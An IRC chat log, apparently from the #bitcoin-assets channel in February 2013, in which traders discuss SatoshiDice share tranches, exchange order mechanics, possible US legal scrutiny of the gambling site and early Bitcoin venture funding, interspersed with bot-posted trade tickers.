[HAVELOCK] [SDICE] 1 @ 0.65 BTC [-] Feb 05 19:39:32 [HAVELOCK] [SDICE] 10 @ 0.611 = 6.11 BTC [-] Feb 05 19:39:33 [HAVELOCK] [SDICE] 10 @ 0.61 = 6.1 BTC [-] Feb 05 19:40:36 bill clinton Feb 05 19:41:01 bill clinton http://i.imgur.com/wAuwF.gif Feb 05 19:42:56 Erik, if you are still around, can I ask what the current & future marketing plans are for SDICE? Feb 05 19:47:02 hey Feb 05 19:47:05 yeah Feb 05 19:47:39 I recall seeing info about a print ad campaign, maybe more, but that was all before my time Feb 05 19:47:54 Just trying to get a sense of what's happening now to strike while the iron's hot Feb 05 19:47:55 the plan, for now, is to get SD some good legal advice on how to proceed in the safest way possible. It is getting lots of press and free advertising, and I don't want to push it further before having all the ducks in a row Feb 05 19:48:10 I see Feb 05 19:48:13 evoorhees: that's great - it's been a worry of mine Feb 05 19:48:55 So the plan is pretty much stasis while legal ducks get in a row Feb 05 19:49:10 is there a website where i can learn about what this is all about? Feb 05 19:49:21 You have to assume that someone at the DOJ is or will take a good look at s.dice. Feb 05 19:49:31 yeah Feb 05 19:49:41 like an s.dice how to? Feb 05 19:49:46 it's an awesome brand and game, and deserves to be set up properly Feb 05 19:49:48 i wanna be a good owl Feb 05 19:49:54 It's funny though, because SDICE isnt really different than any video game Feb 05 19:50:05 it bitcoins that are what they need to look at Feb 05 19:50:07 it's a fair argument Feb 05 19:50:48 and why is it that evoorhees holds 89%? Feb 05 19:50:57 The worst case scenario is they arrest you and splash one of those stupid DOJ banners on satoshidice.com Feb 05 19:50:59 but, either way, I think some strategic marketing would make the site really take off, when it's time Feb 05 19:51:20 even though that doesn't necessarily stop betting, it'll be bad Feb 05 19:51:44 even if they can't charge you with anything, damage will be done Feb 05 19:52:28 [HAVELOCK] [SDICE] 18 @ 0.618 = 11.124 BTC [+] Feb 05 19:52:30 [HAVELOCK] [SDICE] 10 @ 0.6121 = 6.121 BTC [-] Feb 05 19:52:31 [HAVELOCK] [SDICE] 5 @ 0.612 = 3.06 BTC [-] Feb 05 19:52:32 [HAVELOCK] [SDICE] 22 @ 0.61 = 13.42 BTC [-] Feb 05 19:52:33 [HAVELOCK] [SDICE] 45 @ 0.6 = 27 BTC [-] Feb 05 19:53:01 is there a utube for s.dice? Feb 05 19:53:03 so it would be nice to know if you have a contingency plan for that Feb 05 19:53:30 "The worst case scenario is they arrest you and splash one of those stupid DOJ banners on satoshidice.com" - I've taken steps to handle this Feb 05 19:53:42 would be bad for me, but SD would live on Feb 05 19:53:43 It's where the brand is presented, where you learn how to play - it's important Feb 05 19:54:00 ThickAsTh - agreed Feb 05 19:54:14 evoorhees is there a s.dice utube? Feb 05 19:54:28 [HAVELOCK] [SDICE] 10 @ 0.601 = 6.01 BTC [+] Feb 05 19:54:30 [HAVELOCK] [SDICE] 20 @ 0.6 = 12 BTC [-] Feb 05 19:54:31 [HAVELOCK] [SDICE] 40 @ 0.6 = 24 BTC [-] Feb 05 19:54:34 no... you wanna make one? Feb 05 19:54:36 OK. Feb 05 19:54:51 it could be very useful for ppl like me Feb 05 19:55:05 im not a good candidate for that Feb 05 19:55:29 [HAVELOCK] [SDICE] 15 @ 0.6 = 9 BTC [-] Feb 05 19:55:31 [HAVELOCK] [SDICE] 2 @ 0.6 = 1.2 BTC [-] Feb 05 19:55:32 [HAVELOCK] [SDICE] 1 @ 0.6 BTC [-] Feb 05 19:55:33 [HAVELOCK] [SDICE] 1 @ 0.6 BTC [-] Feb 05 19:55:36 anyone know anyone who makes youtube vids? Feb 05 19:58:35 [MPEX] [S.DICE] 1442 @ 0.00689996 = 9.9497 BTC [+] Feb 05 20:00:26 http://en.boardgamearena.com/#!gamepanel?game=cantstop this game is fun Feb 05 20:00:34 makes me think of that Feb 05 20:06:01 That is one side that is missing from SDICE, easily guiding a gambler into setting up a bitcoin wallet and sending a bet Feb 05 20:06:21 i cant get over how bad this site design looks.. Feb 05 20:07:21 yea im still confused about how this bitcoin setup works Feb 05 20:12:38 [BTCTC] [GSDPT] 5050 @ 0.0056 = 28.28 BTC [+] Feb 05 20:13:29 evoorhees i'm all over the youtubes Feb 05 20:14:41 truffles you don't like the SD site? Feb 05 20:14:49 no its terrible Feb 05 20:15:03 jcpham - if you can make a good SD vid for youtube I'll be happy to send you some coins Feb 05 20:15:10 maybe chat with me on skype? Feb 05 20:15:15 [MPEX] [S.MPOE] 4657 @ 0.00068597 = 3.1946 BTC [-] Feb 05 20:15:31 except that you break it every day deadterra :) Feb 05 20:16:04 i've never actually used skype Feb 05 20:16:10 i'm weird with technology Feb 05 20:16:27 it took forever to process now my bitcoin software is still processing wth! Feb 05 20:16:30 so a satoshidice video... Feb 05 20:16:48 yea do include the edge in that in vid Feb 05 20:17:34 sent pm jcpham Feb 05 20:19:14 mircea_popescu: still sleeping? waiting on a deposit here.... :) Feb 05 20:22:17 So if you jumped from .0044 to .0055, where does that leave the next 3 tranches? kinda hard to go too much further up Feb 05 20:22:51 and the market will be down after these two also Feb 05 20:25:15 .0044 clearly angered lots of people Feb 05 20:25:19 whats a tranche? Feb 05 20:26:01 i dunno, it's the word everyone is using for releasing a batch of shares Feb 05 20:26:06 :) Feb 05 20:26:16 .0068 looks like a good price Feb 05 20:26:30 They won't sell at that price Feb 05 20:26:35 a tranche is like a "batch" of something Feb 05 20:26:44 so there can be infinite batches? Feb 05 20:26:44 usually used when talking about financial assets Feb 05 20:27:13 DeaDTerra: he wants to personally rub your bitcoins between his fingers to check if they are counterfeit or not Feb 05 20:27:26 we'll see how things go with .0055 Feb 05 20:27:32 I'll post ahead of time for any other tranches Feb 05 20:27:44 theyre already sold in theory Feb 05 20:28:09 isnt there like 800k depsoited to MPEX waiting? Feb 05 20:28:14 hehe Feb 05 20:28:27 after some thought, on the whole s.dice share thing... maybe it's a good thing that people are forced to think in terms of long term investment (mostly for dividends) rather than traditional stocks. i;d be happy if you would under sell every time. at the moment bitcoin stocks are still, well, they shouldnt be assumed the same Feb 05 20:29:16 seems ppl arent happy about random tranche announcements Feb 05 20:29:29 so i wonder if there is a fixed amount that can be done Feb 05 20:29:33 [MPEX] [S.DICE] 180 @ 0.00689996 = 1.242 BTC [+] Feb 05 20:29:36 truffles: but there really isnt a better way Feb 05 20:29:56 people arent happy because they didnt get "their" share of the opportunity. but it doesnt matter if they are announced in advance or not, its going to be dificult Feb 05 20:30:04 evoorhees: http://www.youtube.com/watch?v=8bFEap2TNB8 Feb 05 20:30:10 i make videos where i endanger others Feb 05 20:30:16 gesell - I like your attitude Feb 05 20:30:28 set a future date when more shares are available, and say the price will be X % of X-day moving average Feb 05 20:30:36 for the big players, announcing is ideal, for the small guys, a surprise might be better Feb 05 20:31:07 i dunno who likes that kind of surprise.. Feb 05 20:31:17 I did Feb 05 20:31:26 the point is that you are not really solving anything truffles Feb 05 20:31:26 because i was awake and saw erik post the news Feb 05 20:31:39 im not solving i want to understand Feb 05 20:31:41 well unfortunately there is no way to tell the whole market at once Feb 05 20:31:45 globe is round :( Feb 05 20:32:35 u cant be afk and typing Feb 05 20:32:35 I take it Bob likes Mircea a lot Feb 05 20:33:34 he has a way with words Feb 05 20:37:24 gesell what was it that you think i was trying to solve though Feb 05 20:37:31 [MPEX] [S.MPOE] 1446 @ 0.00069998 = 1.0122 BTC [+] Feb 05 20:37:45 Posting a portion of the tranches on the passthroughs might also go a long way to keep people quiet. (Could also make things worse too I guess. Havelock price didn't fluctuate much during all this, oddly) Feb 05 20:38:22 truffles: i get the feeling that a lot of the angst is really rooted in the fact that its hard to "get on top of that" share drop opportunity before the established players. but i dont see a way to solve that Feb 05 20:38:40 [BTCTC] [GSDPT] 300 @ 0.0056 = 1.68 BTC [+] Feb 05 20:38:41 or Feb 05 20:40:03 the angst is in relation to people treating mpex stocks like a real stock market. and the volume isnt there for that. if this were a real stock market s.dice drop would have been closer to the market price because there would have been enough volume to eat it up. with where the volume is, it made sense where he put it. ON TOP of that, the whole idea of forcing his investors to think of s.dice stock different, not as a stock to quickly day trade on but ra Feb 05 20:40:20 im curious why they was any rumblings, they knew the risks Feb 05 20:40:46 im not upset at all that i bought at 0078 Feb 05 20:42:07 just sad that i wasnt a mpex whale that could scoop up another 20000k shares at 0044 Feb 05 20:42:07 but that is just the difference between being a mpex player, and being a normal long term investor Feb 05 20:42:08 which reminds me, im gonna take my dividends and reinvest now ;) Feb 05 20:42:30 day trade on but what Feb 05 20:42:34 finish the thought Feb 05 20:44:02 truffles: well not day trade, but to look at the stock as something to trade just on its value alone Feb 05 20:44:13 i mean a lot of the s.dice drop got picked up by people that just plan to resell it. this is investment in relation to supply and demand in the market, not investment in s.dice long term, imho Feb 05 20:46:15 [BTCTC] [GSDPT] 2870 @ 0.0056 = 16.072 BTC [+] Feb 05 20:46:19 maybe i mix up words. hard to describe where i feel there is a difference in how one deals with s.dice on mpex, but there is Feb 05 20:46:55 to me seems like a lil niche for the nerd crowd to swap Feb 05 20:47:44 totally Feb 05 20:47:56 the dividends are not however Feb 05 20:47:57 [MPEX] [S.MPOE] 14000 @ 0.00069998 = 9.7997 BTC [+] Feb 05 20:48:08 EskimoBob_afk "why did you need multiple large investors?" - some investment was needed to provide capital for the betting pool. Feb 05 20:48:23 wasn't so much a "need" as a "that would be smart to do" Feb 05 20:48:44 yes really, why? Feb 05 20:48:55 do you know how large the bet pool is? Feb 05 20:49:11 I assume you've seen the swings of several thousand BTC before :) Feb 05 20:49:18 folks... got an idea. how much would you pay for 250 BTC on MPEx? to be able to place your order nao? Feb 05 20:49:29 [HAVELOCK] [SDICE] 6 @ 0.62 = 3.72 BTC [+] Feb 05 20:49:40 ? Feb 05 20:49:47 no. i can sell some S.MPOE Feb 05 20:50:14 they are my own, not coinbr clients. Feb 05 20:50:22 There are passthrough players already Feb 05 20:50:24 jurov: i'd avoid it Feb 05 20:50:34 it would at a loss, so i just threw it in what would be the offers Feb 05 20:51:14 at what point is s.dice considered mainstream? Feb 05 20:51:41 You know those reports that Dooglus posts daily on bitcointalk.com? Is there a way to generate some of that info on the fly? Feb 05 20:51:42 some point after bitcoin is Feb 05 20:51:59 ThickAsTh: its in the extras directory in bitcoin armory Feb 05 20:52:20 I got that far, but I don't know jack about python Feb 05 20:52:26 i installed it Feb 05 20:52:27 well ppl dont understand how bitcoin works enough to just fool aroudn with so i dunno how thatll happen Feb 05 20:52:29 gesell, why not? Feb 05 20:52:38 and tried running the py, but it doesnt do anything Feb 05 20:52:42 ThickAsTh: python satoshiDiceStats.py Feb 05 20:52:47 it outputs a report Feb 05 20:54:00 thanks pigeons, I'll try again Feb 05 20:56:16 when is this utube expected to be completed with jcpham??? Feb 05 20:56:29 [HAVELOCK] [SDICE] 30 @ 0.62 = 18.6 BTC [+] Feb 05 20:57:38 jurov: well i dont know. guess go for it Feb 05 20:58:24 that depends if anyone makes me interesting offer Feb 05 20:58:48 so far looks like aveyone is content waiting for mp Feb 05 20:59:33 [MPEX] [S.MPOE] 39800 @ 0.00069998 = 27.8592 BTC [+] Feb 05 21:03:01 No but I'm talking with a lawfirm to ensure things are handled properly, now that the site has grown to a significant operation Feb 05 21:03:30 mommy, why is that eskimo angry? Feb 05 21:03:35 [BTCTC] [GSDPT] 952 @ 0.0056 = 5.3312 BTC [+] Feb 05 21:04:17 evoorhees: do you see any other significant business in the market that could provide more s.dice like diversity of investment and activity? Feb 05 21:05:20 gesell - hard to match s.dice today, but for sure over the next year there will be some amazing bitcoin companies that emerge Feb 05 21:05:29 not sure if they'll list on the asset markets though Feb 05 21:05:51 EskimoBob_afk, you're funny Feb 05 21:05:53 because any company that approaches the earning potential of S.dice might follow the traditional route of getting angel invesetment or VCs Feb 05 21:06:19 s.dice was unique because it started tiny and grew without a requirement of capital Feb 05 21:06:57 evoorhees: what if the law firm says that you have to collect info on your shareholders? Feb 05 21:07:03 [BTCTC] [GSDPT] 1500 @ 0.0056 = 8.4 BTC [+] Feb 05 21:07:25 would you take that advice seriously, or ignore it? Feb 05 21:07:30 not sure Feb 05 21:07:44 wrong answer Feb 05 21:08:05 EskimoBob_afk, if that was true, why are there so many Gigaminers claiming and getting paid? Feb 05 21:08:15 bleh, the local bot that bitcoin-24 run on their exchange really is getting on my nerves (it ALWAYS up bids above you) Feb 05 21:09:05 fyi, over 2000 coins have been paid :P Feb 05 21:09:24 that might be a concern for me, not sure Feb 05 21:09:26 so maybe you should shut the fuck up when you don't know what you are fucking talking about Feb 05 21:09:57 a lil Feb 05 21:09:59 wham Feb 05 21:10:08 gigadtfu Feb 05 21:10:25 but how else can we learn if we dont ask.. Feb 05 21:10:39 no need to ask, i do what i say i'm going to do Feb 05 21:10:42 full stop Feb 05 21:10:46 there so many Gigaminers claiming and getting laid? Feb 05 21:10:56 shareholder identities for digital goods seems like like an off-the-mark desire Feb 05 21:11:17 lol Feb 05 21:11:26 over 50% of claims are from outside the US Feb 05 21:11:34 EskimoBob_afk, give it up Feb 05 21:11:41 you have nothing to troll about Feb 05 21:12:01 am i missing some class A trolling? Feb 05 21:12:15 [MPEX] [S.MPOE] 343 @ 0.00068597 = 0.2353 BTC [-] Feb 05 21:12:16 [MPEX] [S.MPOE] 1557 @ 0.00068596 = 1.068 BTC [-] Feb 05 21:12:16 EskimoBob_afk, i hope we meet someday Feb 05 21:13:47 will there be a tape? Feb 05 21:15:21 kind of hard to steal coins when you are paying them back Feb 05 21:16:00 [BTCTC] [GSDPT] 2548 @ 0.0056 = 14.2688 BTC [+] Feb 05 21:16:16 [MPEX] [S.MPOE] 4700 @ 0.00069998 = 3.2899 BTC [+] Feb 05 21:16:26 DeaDTerra: what if someone else uses your number? Feb 05 21:16:30 [HAVELOCK] [SDICE] 10 @ 0.659958 = 6.5996 BTC [+] Feb 05 21:17:31 gigavps, whyd you steal from investors? Feb 05 21:18:57 this is a lot to know, notary?? Feb 05 21:19:05 [BTCTC] [GSDPT] 5000 @ 0.0056 = 28 BTC [+] Feb 05 21:19:49 which Feb 05 21:20:26 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [+] Feb 05 21:20:46 bitcointalk.org? Feb 05 21:21:59 talking to people is instant though Feb 05 21:23:03 i like windows Feb 05 21:23:49 "Why are bitcointalk forum members so stupid?" Feb 05 21:23:54 see im in the right place here Feb 05 21:24:42 "Out of all the forums that I have frequented (and I've been on some seriously high volume forums), it is bitcointalk.org that has the dubious distinction of warehousing the largest number of what can only be described as "retards." " Feb 05 21:26:32 has anyone really looked at the satcoin (SAT Solver for mining) writeup? could this actually extend GPU life a little for mining? Feb 05 21:26:47 i skimmed it Feb 05 21:26:51 gesell, link? Feb 05 21:27:11 http://jheusser.github.com/2013/02/03/satcoin.html Feb 05 21:27:36 i doubt the algo is useful for gpus Feb 05 21:28:11 the SHA1 formula is too big Feb 05 21:30:06 Just saw Dooglus' report, great day for SDICE Feb 05 21:30:08 jurov: i dont understand. why not? its applied to crypto as an alternative for bruteforce Feb 05 21:31:05 nope threat title and 1st comment Feb 05 21:31:10 I've seen much worse forums than bitcointalk.org Feb 05 21:31:15 thread Feb 05 21:31:22 gesell i thought to convert one round of SHA into BNF. got impression that it will be quite big Feb 05 21:31:46 but didn't dug deeper Feb 05 21:32:09 i guess i have reading to do Feb 05 21:32:19 perhaps yu are rightr Feb 05 21:32:20 and gpus need small dataset Feb 05 21:33:29 [HAVELOCK] [SDICE] 20 @ 0.621 = 12.42 BTC [-] Feb 05 21:33:31 [HAVELOCK] [SDICE] 5 @ 0.62 = 3.1 BTC [-] Feb 05 21:34:24 [MPEX] [S.MPOE] 6100 @ 0.00069998 = 4.2699 BTC [+] Feb 05 21:34:30 any chance mpex will be funding wallets before the s.dice drop? Feb 05 21:34:55 still 8 hours left, i believe it will Feb 05 21:35:01 I hope not Feb 05 21:35:10 bleh, waiting for my blockchain to sync. gah Feb 05 21:35:18 Sleep Sleep sweet popescu Feb 05 21:35:40 omg Feb 05 21:36:09 man, DPR should give him a continious supply to keep him awake at all times Feb 05 21:36:15 o some one wanna buy my cxBtc Feb 05 21:36:31 I am selling Feb 05 21:36:32 lol, you're in it too? Feb 05 21:36:42 in what? Feb 05 21:36:43 2 for 1 Feb 05 21:36:48 selling mpexbtc Feb 05 21:36:52 lol Feb 05 21:36:59 such a panic Feb 05 21:37:00 o this is a real sport now? Feb 05 21:37:10 for a 20% gain Feb 05 21:37:18 let's collude Feb 05 21:38:37 what 20% you pay 1.2BTC for 1MPExBTC? Feb 05 21:40:57 lol, theres no mention of the second s.dice drop on reddit. guess they are all just waiting to post complaints post 10pm Feb 05 21:41:52 oh no reddit. the atmosphere is tense enough already :D Feb 05 21:41:55 All this attention is ultimately good for s.dice Feb 05 21:42:39 I think a lot of people were just caught off guard Feb 05 21:42:41 and that is my fault Feb 05 21:42:47 I should've announced it ahead of time Feb 05 21:43:01 YES Feb 05 21:43:06 I'm talking with one of the most vocal critics now, and I think that would've gone a long way to making him feel fine about it Feb 05 21:43:09 Maybe you should sell 2MM Feb 05 21:43:17 that dude probably has like 5000 shares Feb 05 21:43:26 wanker Feb 05 21:44:03 it's fine... he's talking to me now and no worries Feb 05 21:44:04 but maximian has a point. outrageous moves on stock exchange are good for popularity :D Feb 05 21:44:30 evoorhees, i hope you aren't caught "off guard" when the US decides SDICE is no dice Feb 05 21:44:44 so then sell them in blocks of 1k with each block N mBTC greater than the last, pump up the price to insanity :P Feb 05 21:45:11 SDICE is not a US company, nor is it hosted in the US, nor does it use US currency Feb 05 21:45:14 no. sell every 1k block at random price Feb 05 21:45:19 though I know the US does wahtever it wants Feb 05 21:45:40 evoorhees, you should move to Europe and change the domain to satoshidice.ie :) Feb 05 21:45:41 if the US had DHS take down the name and you switched to namecoin, it'd be freaking AWESOME! Feb 05 21:45:48 the domain name i mean Feb 05 21:45:48 evoorhees, exactly Feb 05 21:46:05 hehehe Feb 05 21:46:12 if US residents play your game, you'll probably come under fire at some point Feb 05 21:46:30 [HAVELOCK] [SDICE] 18 @ 0.62 = 11.16 BTC [-] Feb 05 21:46:42 to me, it's the exchanges that deal in fiat that will get in trouble Feb 05 21:46:43 the problem is, the DOJ destroys businesses first, asks questions later. Feb 05 21:46:48 i wonder how the icelandish protection laws for journalism and data safehavens could be applied for gambling Feb 05 21:46:51 they are the main point of laundering Feb 05 21:47:23 [BTCTC] [RSM] 91 @ 0.011 = 1.001 BTC [+] Feb 05 21:47:29 [HAVELOCK] [SDICE] 21 @ 0.62 = 13.02 BTC [-] Feb 05 21:47:36 i'm amazed that converting $ to BTC is going on at all Feb 05 21:48:21 what do you mean thickasth? Feb 05 21:49:04 well the easiest charge Feb 05 21:49:06 is laundering Feb 05 21:49:23 evoorhees, has sdice had any contact for any government regarding the lawfulness of it's operations Feb 05 21:49:27 and that happens the moment fiat is taken and BTC is given Feb 05 21:49:32 s/for/from/ Feb 05 21:49:39 no Feb 05 21:49:42 he is trading fake stuff for other fake stuff in the eyes of anyone Feb 05 21:49:47 he never touches fiat Feb 05 21:50:03 So, places like Dwolla can't last Feb 05 21:50:21 i personally don't see how the govt can say "not legal tender" and then at the same time say "you can't trade play money" Feb 05 21:50:29 so i think legally speaking he is quite safe Feb 05 21:50:45 i think SDICE is pretty safe Feb 05 21:50:52 only vbecause there are bigger, more guilty parties Feb 05 21:50:55 also i thought sdice was in ireland...am i way off? Feb 05 21:50:57 "guilty" Feb 05 21:51:16 sdice is in ireland Feb 05 21:51:17 i read an article where they explained how govt trying to crack down on bitcoin would make it even more successful Feb 05 21:51:25 it is not a company Feb 05 21:51:28 streisand effect Feb 05 21:51:29 Another thing the US could do is regulate where banks can send money Feb 05 21:51:29 it does not have bank accounts Feb 05 21:51:36 they have and could Feb 05 21:51:42 and stop banks from ACHing to bitcoin exchanges Feb 05 21:51:52 evoorhees, it seems like you went from bitcoin spokesperson to accidental millionaire. how do you want to be remembered? Feb 05 21:51:52 jurov, the random price idea is actually really good Feb 05 21:51:56 i want to buy some bitcoins locally in nyc Feb 05 21:52:00 it will hit the highest ask Feb 05 21:52:02 err bid Feb 05 21:52:23 and people must bid thier preferred price, with no guidance from the offering Feb 05 21:52:31 only from the other bids Feb 05 21:52:36 and their own sense Feb 05 21:53:06 just so you guys know Feb 05 21:53:22 have you not seen the startups who have raised seed rounds? Feb 05 21:53:30 coinbase being the most public example? Feb 05 21:53:44 those are some HUGE names attached to the financing of over a half a million USD Feb 05 21:53:48 how much did they raise? Feb 05 21:54:07 and i seriously doubt that those VC's and YCombinator would not at least think of legal ramifications Feb 05 21:54:16 600k Feb 05 21:54:21 !ticker h sdice Feb 05 21:54:22 [HAVELOCK:SDICE] 1D: 0.52100000 / 0.62504313 / 0.76500000 (682 shares, 426.27941480 BTC), 7D: 0.52100000 / 0.71781239 / 0.89000000 (2529 shares, 1815.34753929 BTC), 30D: 0.44000000 / 0.61915127 / 0.89000000 (6188 shares, 3831.30805722 BTC) Feb 05 21:54:26 another one raised half a mil Feb 05 21:54:34 i think 2 actually raised half a mil each Feb 05 21:54:44 so business is starting to notice Feb 05 21:55:03 and coinbase's stated goal is to make it as easy as possible to transfer USD for BTC Feb 05 21:55:25 the revolution will not be televised lol Feb 05 21:55:48 VC money is absolutely noticing bitcoin now Feb 05 21:55:50 I promise Feb 05 21:56:01 yes i know Feb 05 21:56:06 i am hoping to meet with one later this week Feb 05 21:56:15 and have a couple of others who have expressed interest Feb 05 21:56:16 nice Feb 05 21:56:28 in fact firstmark capital is in my office building Feb 05 21:56:29 lol Feb 05 21:56:36 hey neighbor, got a cup of sugar? Feb 05 21:58:28 [BTCTC] [GSDPT] 1500 @ 0.0061 = 9.15 BTC [+] Feb 05 22:00:22 [BTCTC] [GSDPT] 1 @ 0.0066 BTC [+] Feb 05 22:00:24 [BTCTC] [GSDPT] 1499 @ 0.0067 = 10.0433 BTC [+] Feb 05 22:00:37 lol Feb 05 22:09:33 how does coinbase differ from say Mtgox? They are both BTC wallets with the ability to convert from fiat to BTC right? Feb 05 22:16:36 that is my point Feb 05 22:16:45 they try to sell ease of use Feb 05 22:16:49 better UI Feb 05 22:17:00 but they did not actually do anything new Feb 05 22:17:02 i think Feb 05 22:17:10 but that is my point Feb 05 22:17:31 it doesn't have to be crazy and new Feb 05 22:19:10 evoorhees what do you say to these doublespends: http://blockchain.info/double-spends ? Feb 05 22:19:30 [HAVELOCK] [SDICE] 10 @ 0.65 = 6.5 BTC [+] Feb 05 22:24:27 jurov - I have a way to see how many doublespends are successful against SD Feb 05 22:24:35 the number is small :) Feb 05 22:26:45 question jurov you run coinbr right? Feb 05 22:27:14 ys Feb 05 22:27:16 yes Feb 05 22:27:24 i was just curious, if you set a limit order, do you get best price? Feb 05 22:27:41 [MPEX] [S.DICE] 200 @ 0.00677999 = 1.356 BTC [-] Feb 05 22:27:41 ie. let's say i put a limit order at 2... Feb 05 22:27:48 i wanna buy at 2 (example purposes) Feb 05 22:28:02 someone else posts at 1, do i get one? Feb 05 22:28:19 yes you should. for 0.0055 Feb 05 22:29:02 yay Feb 05 22:29:06 (if we'e speaking about buy orders for sdice) Feb 05 22:29:55 ok cool, so if i put it between the bid and ask and evoorhees posts for under my bid i get price improvement... Feb 05 22:30:00 that is what i was just checking Feb 05 22:30:05 yes Feb 05 22:30:23 awesome, localbitcoins better come through today Feb 05 22:30:24 lol Feb 05 22:30:51 no Feb 05 22:30:58 but also someone other can sell to you for that higher price Feb 05 22:31:02 before ipo Feb 05 22:31:03 yes they can Feb 05 22:31:13 you should get it at the price you bid Feb 05 22:31:13 if they choose to sell at my place Feb 05 22:31:17 no... Feb 05 22:31:18 during the IPO as well Feb 05 22:31:30 You have a bid Feb 05 22:31:37 limit is "an order to buy a certain amount of shares at a certain price or better" Feb 05 22:31:40 yes Feb 05 22:31:56 someone places an ask below yours, regardless of origin, you will get filled at your bid Feb 05 22:31:59 you cannot pay MORE than your bid Feb 05 22:32:03 no you won't Feb 05 22:32:08 first...that's not the way limit orders work Feb 05 22:32:15 bugpowder, are you saying that evoorhees will send sell order at 0.0055 and ends up paying more cause of mjr__? Feb 05 22:32:22 second...jurov who runs the broker said i would get price improvement Feb 05 22:32:28 he will get more Feb 05 22:32:33 evoorhees will get more Feb 05 22:32:45 if the bid is higher than the price he posts Feb 05 22:32:45 uh my head Feb 05 22:32:45 this is how it worked in S.BBET IPO Feb 05 22:32:46 no Feb 05 22:32:55 this is how it works in any trading system Feb 05 22:32:56 that is a silent auction Feb 05 22:32:59 oh my gosh Feb 05 22:33:09 You have a bid up Feb 05 22:33:11 http://www.investopedia.com/terms/l/limitorder.asp#axzz2K3IEUttG Feb 05 22:33:13 read Feb 05 22:33:15 dude Feb 05 22:33:24 that is how limit orders work Feb 05 22:33:30 DUDE Feb 05 22:33:30 it's called price improvement Feb 05 22:34:01 the only "limit" is how high you are willing to pay, you can think of it as saying "i will pay any price up to this price for this number of shares" Feb 05 22:34:03 mjr__ think about it a little harder Feb 05 22:34:16 i want to buy 500 shares at this price or better Feb 05 22:34:20 that only works if you are buying into EXISTING ask orders Feb 05 22:34:27 no Feb 05 22:34:32 in this situation it would also work Feb 05 22:34:45 unless evoorhees chooses to set certain shaers at different prices Feb 05 22:34:50 evoorhees will just be selling a LIMIT order into YOUR existing order Feb 05 22:34:53 which he won't Feb 05 22:34:58 the price improvement will work for him, not you Feb 05 22:35:00 he will release a block at a certain price Feb 05 22:35:05 Yes Feb 05 22:35:11 he will SELL a block Feb 05 22:35:14 yes Feb 05 22:35:19 by placing a limit sell order Feb 05 22:35:23 of shares he controls Feb 05 22:35:29 ok Feb 05 22:35:32 yes i know Feb 05 22:35:44 all existing bids will be filled at the bid price, highest first, on down to a limit of .0055 Feb 05 22:35:53 watch Feb 05 22:35:56 at 10pm. Feb 05 22:36:01 hehehe Feb 05 22:36:12 this is why people currently have bids over .0055 Feb 05 22:36:13 wait Feb 05 22:36:18 to ensure they get shares. Feb 05 22:36:21 ah ok Feb 05 22:36:33 if i was closer to the ask, i would get price improvement Feb 05 22:36:44 no Feb 05 22:36:55 if his ask existed Feb 05 22:37:04 BEFORE you place the order, you will get improvement Feb 05 22:37:16 hmnmm Feb 05 22:37:27 by the way did he announce the price is going to be .0055 Feb 05 22:37:31 ? Feb 05 22:38:57 yes Feb 05 22:39:00 maybe the bids will pile up high enough that 0.0055 isn't reached. Feb 05 22:39:01 its in a thread Feb 05 22:39:05 it is possible Feb 05 22:39:25 Should be fun! Feb 05 22:39:28 yep Feb 05 22:39:34 S.BBET IPO was fucking insane Feb 05 22:40:00 a new block of 10,000 shares issued 1.03x every 1 second Feb 05 22:40:34 yes. i'm just looking it up to be certain Feb 05 22:41:11 for exaple before IPO there was buy order "Quantity":"54500", "Price":"55000" Feb 05 22:41:49 and during IPO all the transactions went at price 55000 till the order wasn';t exhausted Feb 05 22:42:10 so it should be clear now Feb 05 22:42:31 [HAVELOCK] [SDICE] 20 @ 0.6499 = 12.998 BTC [-] Feb 05 22:43:54 sry for confusion Feb 05 22:43:56 :D Feb 05 22:48:24 ;;seen smickles Feb 05 22:48:24 smickles was last seen in #bitcoin-assets 1 day, 2 hours, 11 minutes, and 49 seconds ago: i think i recall someone keeping a log Feb 05 22:49:30 [HAVELOCK] [SDICE] 15 @ 0.65 = 9.75 BTC [+] Feb 05 22:59:05 mircea_popescu: when will you be around to process deposits? Feb 05 23:00:21 how many shares are in the SD 2nd tranche? Feb 05 23:00:28 1million Feb 05 23:00:41 thanks jurov Feb 05 23:00:48 based on first, 1m Feb 05 23:00:48 yeah Feb 05 23:01:23 im kind of resolving myself to the reality that i might not see any of it. oh well Feb 05 23:02:32 i missed the 1st tranche cos i went to see Tim Berners-Lee Feb 05 23:03:48 well, we all mess up sometimes ;) Feb 05 23:04:21 leotreasure: : its gonna getcrazy Feb 05 23:04:46 i hope i won't mess anything... it will be 4am here and i'll be a zombie Feb 05 23:05:16 and i can't go sleep since coinbr users are pounding on the door already Feb 05 23:05:45 if i credit them late there will be lynchmob or dunno Feb 05 23:05:54 cheap shares yesterday = all is wrong, less cheap shares today = all is swell! Feb 05 23:05:59 hehehe Feb 05 23:07:52 " Feb 05 23:07:53 I know it takes 48hrs to post due to manual processing, etc ... but Feb 05 23:07:55 > can you work with MPEX to speed it up? Feb 05 23:07:56 " Feb 05 23:07:58 sigh Feb 05 23:09:55 yeah, let it roll off. who knows, maybe mircea_popescu will save you by just not waking up for the next 8 hours and then it can be all his fault ;) Feb 05 23:10:24 by the way - I won't release the tranche until mircea has joined and cleared the funds Feb 05 23:11:14 awwww! Feb 05 23:11:30 will people get mad at me for that also? :) Feb 05 23:11:50 there's always something to be mad about :) Feb 05 23:12:15 yes Feb 05 23:12:19 except on dividends day Feb 05 23:12:21 you should do it when you said you wold Feb 05 23:12:35 people should park their coins on mpex Feb 05 23:12:44 so they can be prepared Feb 05 23:12:45 like me Feb 05 23:13:23 ya. Feb 05 23:13:30 a fair point Feb 05 23:13:31 prepared bought stuff yesterday. Feb 05 23:13:36 :) Feb 05 23:14:27 mircea told me he was taking everyones bittycoins Feb 05 23:14:36 he wanted me to tell you to have a nice day, though Feb 05 23:14:56 sweet, the best bitcoin asset is a casino Feb 05 23:15:03 great job erik Feb 05 23:15:08 not your fault i guess Feb 05 23:15:13 but sweet Feb 05 23:15:29 prepared was sleeping Feb 05 23:15:30 yes erik not your fault for being successuful, shit just happens. Feb 05 23:16:35 [MPEX] [S.MPOE] 4321 @ 0.00069769 = 3.0147 BTC [-] Feb 05 23:16:37 [MPEX] [S.MPOE] 6756 @ 0.00069744 = 4.7119 BTC [-] Feb 05 23:22:01 What is the bitcoin to Amazon coin exchange rate? Feb 05 23:22:58 the thing that just came out today? Feb 05 23:23:09 or amazon cash as in gift codes Feb 05 23:24:11 it's looking like -%10 Amazon for BTC right now otc 